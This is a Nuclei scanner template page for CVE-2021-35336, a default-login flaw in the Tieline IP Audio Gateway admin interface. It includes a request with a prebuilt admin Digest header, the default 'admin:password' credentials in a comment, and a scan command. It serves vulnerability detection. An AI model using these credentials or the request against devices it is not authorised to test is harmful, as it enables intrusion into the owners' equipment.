Skip to content
Nuclei Templates

Tieline IP Audio Gateway <=2.6.4.8 - Unauthorized Remote Admin Panel Access

ID: CVE-2021-35336

Severity: critical

Author: Pratik Khalane

Tags: cve2021,cve,tieline,default-login

Description

Section titled “Description”

Tieline IP Audio Gateway 2.6.4.8 and below is affected by a vulnerability in the web administrative interface that could allow an unauthenticated user to access a sensitive part of the system with a high privileged account.

YAML Source

Section titled “YAML Source”
id: CVE-2021-35336


info:
  name: Tieline IP Audio Gateway <=2.6.4.8 - Unauthorized Remote Admin Panel Access
  author: Pratik Khalane
  severity: critical
  description: Tieline IP Audio Gateway 2.6.4.8 and below is affected by a vulnerability in the web administrative interface that could allow an unauthenticated user to access a sensitive part of the system with a high privileged account.
  impact: |
    An attacker can gain unauthorized access to the admin panel, potentially leading to unauthorized control and manipulation of the audio gateway.
  remediation: |
    Upgrade to a patched version of Tieline IP Audio Gateway that fixes the vulnerability.
  reference:
    - https://pratikkhalane91.medium.com/use-of-default-credentials-to-unauthorised-remote-access-of-internal-panel-of-tieline-c1ffe3b3757c
    - https://nvd.nist.gov/vuln/detail/CVE-2021-35336
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-35336
    cwe-id: CWE-1188
    epss-score: 0.13449
    epss-percentile: 0.95592
    cpe: cpe:2.3:h:tieline:ip_audtio_gateway:-:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: tieline
    product: ip_audtio_gateway
  tags: cve2021,cve,tieline,default-login


http:
  - method: GET
    path:
      - '{{BaseURL}}/api/get_device_details'


    headers:
      Authorization: 'Digest username="admin", realm="Bridge-IT", nonce="d24d09512ebc3e43c4f6faf34fdb8c76", uri="/api/get_device_details", response="d052e9299debc7bd9cb8adef0a83fed4", qop=auth, nc=00000001, cnonce="ae373d748855243d"'
      Referer: '{{BaseURL}}/assets/base/home.html'


    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<SERIAL>"
          - "<VERSION>"
        condition: and


      - type: word
        part: header
        words:
          - "text/xml"


      - type: status
        status:
          - 200


# admin:password
# digest: 490a0046304402206fbe9780a09a7683e74d2cc632a390a041e800e22591777db7ba87472edc8e8502202a3f72f2c052f13c60b48d48ec0afce214c8755fad27a8ae9f7447ef61ba372e:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-35336.yaml"

View on Github